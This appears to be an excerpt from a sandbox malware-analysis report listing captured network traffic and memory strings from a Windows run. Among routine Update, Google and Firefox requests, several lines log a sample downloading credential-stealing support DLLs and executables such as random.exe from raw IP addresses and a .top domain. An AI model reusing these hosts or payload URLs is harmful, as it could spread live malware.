                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=EnPNfHXroMtz3vU&MD=Ptzta2Fs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
                      Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
                      Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                      Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                      Source: firefox.exe, 0000002B.00000002.3196415403.0000023768360000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
